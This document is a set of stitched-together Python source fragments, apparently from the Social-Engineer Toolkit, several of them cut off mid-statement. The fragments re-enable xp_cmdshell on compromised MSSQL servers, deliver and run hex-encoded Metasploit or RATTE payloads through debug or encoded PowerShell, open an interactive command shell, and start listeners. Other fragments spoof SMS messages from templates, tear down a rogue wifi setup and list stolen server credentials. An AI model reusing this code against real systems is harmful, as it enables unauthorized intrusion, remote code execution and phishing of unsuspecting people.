def deploy_hex2binary(ipaddr, port, username, password, option): # connect to SQL server target_server = _mssql.connect(ipaddr + ":" + str(port), username, password) setcore.PrintStatus("Connection established with SQL Server...") setcore.PrintStatus("Converting payload to hexadecimal...") # if we are using a SET interactive shell payload then we need to make the path under web_clone versus program_junk if os.path.isfile("src/program_junk/set.payload"): web_path = ("src/program_junk/web_clone/") # then we are using metasploit if not os.path.isfile("src/program_junk/set.payload"): if operating_system == "posix": web_path = ("src/program_junk") subprocess.Popen( "cp src/html/msf.exe src/program_junk/ 1> /dev/null 2> /dev/null", shell=True).wait() subprocess.Popen( "cp src/program_junk/msf2.exe src/program_junk/msf.exe 1> /dev/null 2> /dev/null", shell=True).wait() fileopen = file("%s/msf.exe" % (web_path), "rb") # read in the binary data = fileopen.read() # convert the binary to hex data = binascii.hexlify(data) # we write out binary out to a file filewrite = file("src/program_junk/payload.hex", "w") filewrite.write(data) filewrite.close() # if we are using metasploit, start the listener if not os.path.isfile("%s/src/program_junk/set.payload" % (definepath)): if operating_system == "posix": import pexpect meta_path = setcore.meta_path() setcore.PrintStatus("Starting the Metasploit listener...") child2 = pexpect.spawn( "%s/msfconsole -r src/program_junk/meta_config" % (meta_path)) # random executable name random_exe = setcore.generate_random_string(10, 15) # # next we deploy our hex to binary if we selected option 1 (powershell) # if option == "1": # powershell command here, needs to be unicoded then base64 in order to use encodedcommand powershell_command = unicode( "$s=gc \"C:\\Windows\\system32\\%s\";$s=[string]::Join('',$s);$s=$s.Replace('`r',''); $s=$s.Replace('`n','');$b=new-object byte[] $($s.Length/2);0..$($b.Length-1)|%%{$b[$_]=[Convert]::ToByte($s.Substring($($_*2),2),16)};[IO.File]::WriteAllBytes(\"C:\\Windows\\system32\\%s.exe\",$b)" % (random_exe, random_exe)) ######################################################################################################################################################################################################## # # there is an odd bug with python unicode, traditional unicode inserts a null byte after each character typically.. python does not so the encodedcommand becomes corrupt # in order to get around this a null byte is pushed to each string value to fix this and make the encodedcommand work properly # ######################################################################################################################################################################################################## # blank command will store our fixed unicode variable blank_command = "" # loop through each character and insert null byte for char in powershell_command: # insert the nullbyte blank_command += char + "\x00" # assign powershell command as the new one powershell_command = blank_command # base64 encode the powershell command powershell_command = base64.b64encode(powershell_command) # this will trigger when we are ready to convert # # next we deploy our hex to binary if we selected option 2 (debug) # if option == "2": setcore.PrintStatus( "Attempting to re-enable the xp_cmdshell stored procedure if disabled.." ) # reconfigure the stored procedure and re-enable try: target_server.execute_query( "EXEC sp_configure 'show advanced options', 1; RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;" ) # need to do it a second time for some reason on 2005 target_server.execute_query("RECONFIGURE;") except: pass # we selected hex to binary fileopen = file("src/payloads/hex2binary.payload", "r") # specify random filename for deployment setcore.PrintStatus("Deploying initial debug stager to the system.") random_file = setcore.generate_random_string(10, 15) for line in fileopen: # remove bogus chars line = line.rstrip() # make it printer friendly to screen print_line = line.replace("echo e", "") setcore.PrintStatus("Deploying stager payload (hex): " + setcore.bcolors.BOLD + str(print_line) + setcore.bcolors.ENDC) target_server.execute_query("xp_cmdshell '%s>> %s'" % (line, random_file)) setcore.PrintStatus("Converting the stager to a binary...") # here we convert it to a binary target_server.execute_query("xp_cmdshell 'debug<%s'" % (random_file)) setcore.PrintStatus("Conversion complete. Cleaning up...") # delete the random file target_server.execute_query("xp_cmdshell 'del %s'" % (random_file)) # here we start the conversion and execute the payload setcore.PrintStatus( "Sending the main payload via to be converted back to a binary.") # read in the file 900 bytes at a time fileopen = file("src/program_junk/payload.hex", "r") #random_exe = setcore.generate_random_string(10,15) while fileopen: data = fileopen.read(900).rstrip() # if data is done then break out of loop because file is over if data == "": break setcore.PrintStatus("Deploying payload to victim machine (hex): " + setcore.bcolors.BOLD + str(data) + setcore.bcolors.ENDC + "\n") target_server.execute_query("xp_cmdshell 'echo %s>> %s'" % (data, random_exe)) setcore.PrintStatus( "Delivery complete. Converting hex back to binary format.") # if we are using debug conversion then convert our binary if option == "2": target_server.execute_query("xp_cmdshell 'rename MOO.bin %s.exe'" % (random_file)) target_server.execute_query("xp_cmdshell '%s %s'" % (random_file, random_exe)) # clean up the old files setcore.PrintStatus("Cleaning up old files..") target_server.execute_query("xp_cmdshell 'del %s'" % (random_exe)) # if we are using SET payload if os.path.isfile("%s/src/program_junk/set.payload" % (definepath)): setcore.PrintStatus("Spawning seperate child process for listener...") try: shutil.copyfile("src/program_junk/web_clone/x", definepath) except: pass # start a threaded webserver in the background #import src.html.fasttrack_http_server subprocess.Popen("python src/html/fasttrack_http_server.py", shell=True) #child1 = pexpect.spawn("python src/html/fasttrack_http_server.py") # grab the port options if os.path.isfile("%s/src/program_junk/port.options" % (definepath)): fileopen = file("%s/src/program_junk/port.options" % (definepath), "r") port = fileopen.read().rstrip() # if for some reason the port didnt get created we default to 443 if not os.path.isfile("%s/src/program_junk/port.options" % (definepath)): port = "443" # default 443 # launch the python listener through pexpect # need to change the directory real quick os.chdir(definepath) #child2 = pexpect.spawn("python src/payloads/set_payloads/listener.py %s" % (port)) # now back os.chdir("src/program_junk/web_clone/") setcore.PrintStatus("Triggering payload stager...") # thread is needed here due to the connect not always terminating thread, it hangs if thread isnt specified import thread # execute the payload # we append more commands if option 1 is used if option == "1": random_exe_execute = random_exe random_exe = "powershell -EncodedCommand " + powershell_command sql_command = ("xp_cmdshell '%s'" % (random_exe)) # start thread of SQL command that executes payload thread.start_new_thread(target_server.execute_query, (sql_command, )) #time.sleep(5) time.sleep(1) # trigger the exe if option 1 is used if option == "1": sql_command = ("xp_cmdshell '%s'" % (random_exe_execute)) thread.start_new_thread(target_server.execute_query, (sql_command, )) # if pexpect doesnt exit right then it freaks out if os.path.isfile("%s/src/program_junk/set.payload" % (definepath)): os.system("python ../../payloads/set_payloads/listener.py") try: # interact with the child process through pexpect child2.interact() try: os.remove("x") except: pass except: pass
# if we selected RATTE in our payload selection if payload_selection == "RATTE": fileopen = file("src/payloads/ratte/ratte.binary", "rb") data = fileopen.read() filewrite = open("src/program_junk/msf.exe", "wb") host = int(len(ipaddr) + 1) * "X" rPort = int(len(str(port)) + 1) * "Y" filewrite.write(data.replace(str(host), ipaddr + "\x00", 1)) filewrite.close() fileopen = open("src/program_junk/msf.exe", "rb") data = fileopen.read() filewrite = open("src/program_junk/msf.exe", "wb") filewrite.write(data.replace(str(rPort), str(port) + "\x00", 1)) filewrite.close() setcore.PrintStatus("Done, moving the payload into the action.") if upx_encode == "ON" or upx_encode == "on": # core upx pass #setcore.upx("src/program_junk/msf.exe") if os.path.isfile("src/program_junk/web_clone/msf.exe"): os.remove("src/program_junk/web_clone/msf.exe") if os.path.isfile("src/program_junk/msf.exe"): shutil.copyfile("src/program_junk/msf.exe", "src/program_junk/web_clone/msf.exe") if payload_selection == "SETSHELL": if os.path.isfile("%s/src/program_junk/web_clone/x" % (definepath)): os.remove("%s/src/program_junk/web_clone/x" % (definepath)) shutil.copyfile(
# # this will deploy an already prestaged executable that reads in hexadecimal and back to binary # def cmdshell(ipaddr, port, username, password, option): # connect to SQL server mssql = _mssql.connect(ipaddr + ":" + str(port), username, password) setcore.PrintStatus("Connection established with SQL Server...") setcore.PrintStatus("Attempting to re-enable xp_cmdshell if disabled...") try: mssql.execute_query( "EXEC sp_configure 'show advanced options', 1;GO;RECONFIGURE;GO;EXEC sp_configure 'xp_cmdshell', 1;GO;RECONFIGURE;GO;" ) mssql.execute_query("RECONFIGURE;") except Exception, e: pass setcore.PrintStatus( "Enter your Windows Shell commands in the xp_cmdshell - prompt...") mssql.select_db('master') while 1: # cmdshell command cmd = raw_input("xp_cmdshell> ") # exit if we want if cmd == "quit" or cmd == "exit": break mssql.execute_query("xp_cmdshell '%s'" % (cmd)) if cmd != "": for line in mssql: line = str(line) line = line.replace("', 'output': '", "\n") line = line.replace("{0: '", "") line = line.replace("'}", "") line = line.replace("{0: None, 'output': None}", "") line = line.replace("\\r", "")
except: import autorun if infectious_menu_choice == "2": sys.path.append("src/core/payloadgen/") try: reload(solo) except: import solo # Main Menu choice 4: Create a Payload and Listener if main_menu_choice == '4': filewrite = file("src/program_junk/payloadgen", "w") filewrite.write("payloadgen=solo") filewrite.close() sys.path.append("src/core/payloadgen/") try: reload(create_payloads) except: import create_payloads setcore.PrintStatus("Your payload is now in the root directory of SET as msf.exe") if os.path.isfile("src/program_junk/meterpreter.alpha"): print "[*] Saving alphanumeric shellcode in root directory of SET as meterpreter.alpha" subprocess.Popen("cp src/program_junk/meterpreter.alpha ./", stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True) subprocess.Popen("cp src/html/msf.exe ./msf.exe 1> /dev/null 2> /dev/null", shell = True).wait() # if we didn't select the SET interactive shell or RATTE if not os.path.isfile("src/program_junk/set.payload"): setcore.upx("msf.exe") # if the set payload is there if os.path.isfile("src/program_junk/set.payload"): subprocess.Popen("cp src/program_junk/msf.exe ./msf.exe 1> /dev/null 2> /dev/null", shell = True).wait() try: reload(solo) except: import solo
#!/usr/bin/env python import subprocess from src.core import setcore # # Simple python script to kill things created by the SET wifi attack vector # interface = raw_input( setcore.setprompt(["8"], "Enter your wireless interface (ex: wlan0): ")) # fix a bug if present setcore.PrintStatus( "Attempting to set rfkill to unblock all if RTL is in use. Ignore errors on this." ) subprocess.Popen( "rmmod rtl8187;rfkill block all;rfkill unblock all;modprobe rtl8187;rfkill unblock all;ifconfig %s up" % (interface), shell=True).wait() setcore.PrintStatus("Killing airbase-ng...") subprocess.Popen("killall airbase-ng", shell=True).wait() setcore.PrintStatus("Killing dhcpd3 and dhclient3...") subprocess.Popen("killall dhcpd3", shell=True).wait() subprocess.Popen("killall dhclient3", shell=True).wait() setcore.PrintStatus("Killing dnsspoof...") subprocess.Popen("killall dnsspoof", shell=True).wait()
def launch(): while 1: print(""" 1. Pre-Defined Template 2. One-Time Use SMS 99. Cancel and return to SMS Spoofing Menu """) template_choice = raw_input( core.setprompt( ["7"], "Use a predefined template or craft a one time SMS?")) # if predefined template go here if template_choice == '1': # set path for path = 'src/templates/sms/' filewrite = file("src/program_junk/sms.templates", "w") counter = 0 # Pull all files in the templates directory for infile in glob.glob(os.path.join(path, '*.template')): infile = infile.split("/") # grab just the filename infile = infile[3] counter = counter + 1 # put it in a format we can use later in a file filewrite.write(infile + " " + str(counter) + "\n") # close the file filewrite.close() # read in formatted filenames fileread = file("src/program_junk/sms.templates", "r").readlines() print "Below is a list of available templates:\n" for line in fileread: line = line.rstrip() line = line.split(" ") filename = line[0] # read in file fileread2 = file("src/templates/sms/%s" % (filename), "r").readlines() for line2 in fileread2: match = re.search("SUBJECT=", line2) if match: line2 = line2.rstrip() line2 = line2.split("=") line2 = line2[1] # strip double quotes line2 = line2.replace('"', "") # display results back print line[1] + ": " + line2 # allow user to select template choice = raw_input(core.setprompt(["7"], "Select template")) for line in fileread: # split based off of space line = line.split(" ") # search for the choice match = re.search(str(choice), line[1]) if match: extract = line[0] fileopen = file("src/templates/sms/" + str(extract), "r").readlines() for line2 in fileopen: match2 = re.search("ORIGIN=", line2) if match2: origin = line2.replace('"', "") origin = origin.split("=") origin = origin[1] match3 = re.search("SUBJECT=", line2) if match3: subject = line2.replace('"', "") subject = subject.split("=") subject = subject[1] match4 = re.search("BODY=", line2) if match4: body = line2.replace('"', "") body = body.replace(r'\n', " \n ") body = body.split("=") body = body[1] break if template_choice == '2': try: origin = raw_input(core.setprompt(["7"], "Source number phone")) body = raw_input( core.setprompt([ "7" ], "Body of the message, hit return for a new line. Control+c when finished" )) while body != 'sdfsdfihdsfsodhdsofh': try: body += ("\n") body += raw_input("Next line of the body: ") except KeyboardInterrupt: break except KeyboardInterrupt: pass break if template_choice == '99': break if template_choice != '3': while 1: print(""" Service Selection There are diferent services you can use for the SMS spoofing, select your own. 1. SohoOS (buggy) 2. Lleida.net (pay) 3. SMSGANG (pay) 4. Android Emulator (need to install Android Emulator) 99. Cancel and return to SMS Spoofing Menu """) service_option = raw_input(core.setprompt(["7"], "")) # exit if service_option == '1': break if service_option == '2': break if service_option == '3': break if service_option == '4': break if service_option == '99': break if template_choice != '3' and service_option != '99': #sohoOS service if service_option == '1': for to in phones: send_sohoos_sms(to.rstrip(), origin.rstrip(), body.rstrip()) # Finish here then return to main menu core.PrintStatus("SET has completed!") core.ReturnContinue() #Lleida.net service if service_option == '2': user = raw_input(core.setprompt(["7"], "Your Lleida.net user")) password = raw_input( core.setprompt(["7"], "Your Lleida.net password")) email = raw_input( core.setprompt(["7"], "Email for the receipt (optional)")) for to in phones: send_lleidanet_sms(to.rstrip(), origin.rstrip(), body.rstrip(), user, password, email) # Finish here then return to main menu core.PrintStatus("SET has completed!") core.ReturnContinue() #SMSGANG service if service_option == '3': pincode = raw_input(core.setprompt(["7"], "Your SMSGANG pincode")) for to in phones: send_smsgang_sms(to.rstrip(), origin.rstrip(), body.rstrip(), pincode) # Finish here then return to main menu core.PrintStatus("SET has completed!") core.ReturnContinue() #Andriod Emulator service if service_option == '4': for to in phones: send_android_emu_sms(origin.rstrip(), body.rstrip()) # Finish here then return to main menu core.PrintStatus("SET has completed!") core.ReturnContinue()
if counter == 0: setcore.PrintWarning( "Sorry. Unable to locate or fully compromise a MSSQL Server." ) pause = raw_input( "Press {return} to continue to the main menu.") # if we successfully attacked one if counter == 1: # need to loop to keep menu going while 1: # set a counter to show compromised servers counter = 1 # here we list the servers we compromised master_names = master_list.split(":") setcore.PrintStatus( "Select the compromise SQL server you want to interact with:\n" ) for success in master_names: if success != "": success = success.rstrip() success = success.split(",") success = setcore.bcolors.BOLD + success[ 0] + setcore.bcolors.ENDC + " username: "******"%s" % ( success[1] ) + setcore.bcolors.ENDC + " | password: "******"%s" % ( success[3]) + setcore.bcolors.ENDC print " " + str(counter) + ". " + success # increment counter counter = counter + 1 print "\n 99. Return back to the main menu.\n"